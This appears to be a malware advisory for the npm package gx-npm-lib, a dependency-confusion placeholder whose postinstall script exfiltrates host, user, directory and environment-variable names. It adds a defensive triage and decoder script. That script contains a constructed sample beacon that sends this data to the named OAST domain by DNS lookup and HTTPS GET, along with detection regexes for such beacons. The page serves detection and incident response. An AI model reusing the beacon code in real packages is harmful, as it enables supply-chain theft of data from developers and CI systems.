
MAL-2026-6480

Malicious code in gx-npm-lib (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e919710d2f28ec776b8165821ebe2fbe480c1e432ec9416c7b73bd1315ee6a6e)

The package was published at version 99.99.99 under a generic name (`gx-npm-lib`). This is the canonical dependency-confusion shape: a public package whose name shadows an internal one, carrying a version number high enough that CI version resolution prefers the public copy.

The `postinstall` lifecycle script runs `node beacon.js`, which collects installer metadata (package name, `os.hostname()`, the `os.userInfo()` username, `process.cwd()`, the names of the `process.env` variables, and the Node version) and exfiltrates it over two channels to the hardcoded attacker-controlled OAST domain `d8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me`: (1) a DNS lookup that encodes `pkg.host.user` as subdomain labels, and (2) an HTTPS GET that carries the same data base64-encoded in a query parameter, `https://d8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me/<pkg>?d=<base64>`.

The package self-describes as a 'security-research placeholder' for a dependency-confusion PoC, but that self-label does not constitute installer consent: `npm install` in any environment where this package resolves (CI for an internal `gx-npm-lib`, or a developer mistyping the name) leaks a host/user/cwd/environment inventory to the attacker's OAST collector. Multi-channel (DNS plus HTTPS with base64) exfiltration to a hardcoded interactsh-style domain on a default install is a textbook active supply-chain attack.
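The install-time beacon pattern described above can be triaged statically from a package's manifest and install script, and both exfiltration channels can be decoded after the fact from DNS logs or a proxy capture. The following is an added example written for this page, not code from Amazon Inspector, the OSV record, or the gx-npm-lib package. The manifest, the stand-in `beacon.js` source, the DNS query name and the beacon URL are constructed for illustration; only the OAST domain and the `https://<oast>/<pkg>?d=<base64>` URL shape come from the advisory, and the indicator regexes and the list of interactsh public server suffixes are assumptions of this example.

```javascript
// Added example for this advisory page: not code from Amazon Inspector, the
// OSV record, or the gx-npm-lib package. Static triage of an npm manifest plus
// its install script for the install-time beacon pattern, and decoders for the
// two exfiltration channels (DNS labels and base64 query parameter) so a
// responder can recover what a captured beacon leaked.
// Assumptions: the indicator regexes and the interactsh suffix list are ours;
// the sample manifest, beacon source, query name and URL are constructed.

const OAST = 'd8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me'; // domain named in the advisory

const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Source-level indicators of installer fingerprinting and exfiltration.
const INDICATORS = [
  { id: 'host-fingerprint', re: /\bos\.(hostname|userInfo)\s*\(/ },
  { id: 'env-enumeration', re: /Object\.keys\(\s*process\.env\s*\)/ },
  { id: 'dns-channel', re: /\bdns\.(lookup|resolve\w*)\s*\(/ },
  { id: 'https-channel', re: /\bhttps?\.(get|request)\s*\(/ },
  { id: 'base64-encoding', re: /toString\(\s*['"]base64['"]\s*\)/ },
  // Common interactsh public server suffixes (assumed list).
  { id: 'oast-domain', re: /\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.oast\.(?:me|fun|live|site|online|pro)\b/ },
];

// Lifecycle scripts a manifest declares; npm runs these on install unless
// --ignore-scripts is set.
function lifecycleScripts(manifest) {
  const scripts = manifest.scripts || {};
  return LIFECYCLE.filter((k) => typeof scripts[k] === 'string')
    .map((k) => ({ hook: k, command: scripts[k] }));
}

// Verdict: which indicators fire, and whether an install hook, fingerprinting
// and a network channel coincide, which is the combination worth blocking.
function triagePackage(manifest, scriptSource) {
  const hooks = lifecycleScripts(manifest);
  const hits = INDICATORS.filter((i) => i.re.test(scriptSource)).map((i) => i.id);
  const fingerprints = hits.includes('host-fingerprint') || hits.includes('env-enumeration');
  const channel = hits.includes('dns-channel') || hits.includes('https-channel');
  return { hooks, hits, block: hooks.length > 0 && fingerprints && channel };
}

// Decode a DNS beacon of the form `<pkg>.<host>.<user>.<oast domain>`.
// Labels cannot contain dots, so a dotted hostname would add labels; we
// require exactly three and return null otherwise rather than guess.
function decodeDnsBeacon(qname, oastDomain) {
  const suffix = '.' + oastDomain;
  if (!qname.endsWith(suffix)) return null;
  const labels = qname.slice(0, -suffix.length).split('.');
  if (labels.length !== 3) return null;
  const [pkg, host, user] = labels;
  return { pkg, host, user };
}

// Decode an HTTPS beacon of the form `https://<oast>/<pkg>?d=<base64 JSON>`.
function decodeHttpsBeacon(url, oastDomain) {
  const u = new URL(url);
  if (u.hostname !== oastDomain) return null;
  // Read the raw parameter: URLSearchParams would turn a '+' from standard
  // base64 into a space.
  const m = /[?&]d=([^&#]*)/.exec(u.search);
  if (!m) return null;
  const json = Buffer.from(decodeURIComponent(m[1]), 'base64').toString('utf8');
  return { pkg: u.pathname.slice(1), payload: JSON.parse(json) };
}

// ---- Constructed samples (not the real package contents) ----
const SAMPLE_MANIFEST = { name: 'gx-npm-lib', version: '99.99.99', scripts: { postinstall: 'node beacon.js' } };
const SAMPLE_BEACON = `
const os = require('os'), dns = require('dns'), https = require('https');
const info = { pkg: 'gx-npm-lib', host: os.hostname(), user: os.userInfo().username,
  cwd: process.cwd(), env: Object.keys(process.env), node: process.version };
const d = Buffer.from(JSON.stringify(info)).toString('base64');
dns.lookup(info.pkg + '.' + info.host + '.' + info.user + '.${OAST}', () => {});
https.get('https://${OAST}/' + info.pkg + '?d=' + encodeURIComponent(d), () => {});
`;
const SAMPLE_QNAME = `gx-npm-lib.ci-runner-7.builder.${OAST}`;
const SAMPLE_PAYLOAD = { pkg: 'gx-npm-lib', host: 'ci-runner-7', user: 'builder',
  cwd: '/home/builder/app', env: ['PATH', 'HOME', 'NPM_TOKEN'], node: 'v20.11.0' };
const SAMPLE_URL = `https://${OAST}/gx-npm-lib?d=` +
  encodeURIComponent(Buffer.from(JSON.stringify(SAMPLE_PAYLOAD)).toString('base64'));

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(triagePackage(SAMPLE_MANIFEST, SAMPLE_BEACON));
  console.log(decodeDnsBeacon(SAMPLE_QNAME, OAST));
  console.log(decodeHttpsBeacon(SAMPLE_URL, OAST));
}
```

The triage verdict keys on the combination rather than any single indicator, because `os.hostname()` or `https.get()` alone appear in plenty of legitimate packages; a lifecycle hook that both fingerprints the host and opens a network channel is the shape that should fail a registry ingestion check. The decoders are what an incident responder runs over the DNS resolver log or proxy capture from the affected runner to establish exactly which hostname, username, working directory and environment-variable names left the building.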


Affected packages

npm / gx-npm-lib

No fixed version published yet for gx-npm-lib (npm). Pin to a known-safe version or switch to an alternative. Note that this public package exists only as a dependency-confusion placeholder, so there is no safe version of it to pin: if you depend on an internal package named `gx-npm-lib`, make sure it resolves from your private registry (a scoped name with a per-scope registry mapping in `.npmrc`, with no fallback to the public registry), and run `npm ci --ignore-scripts` in CI so a lifecycle script cannot execute even if resolution goes wrong.
